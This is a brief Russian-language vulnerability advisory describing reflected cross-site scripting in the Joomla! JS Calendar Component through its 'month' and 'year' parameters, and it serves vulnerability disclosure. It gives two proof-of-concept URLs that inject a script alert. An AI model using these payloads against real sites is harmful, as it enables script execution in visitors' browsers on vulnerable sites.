Программа: Joomla! JS Calendar Component

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "month" и "year" (когда "option" установлен в "com_jscalendar"
и "view" установлен в "jscalendar"). Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://site/path/index.php?option=com_jscalendar&view=jscalendar&month=<script>alert(‘XSS’);</script>

http://site/path/index.php?option=com_jscalendar&view=jscalendar&year=<script>alert(‘XSS’);</script>



Оставить мнение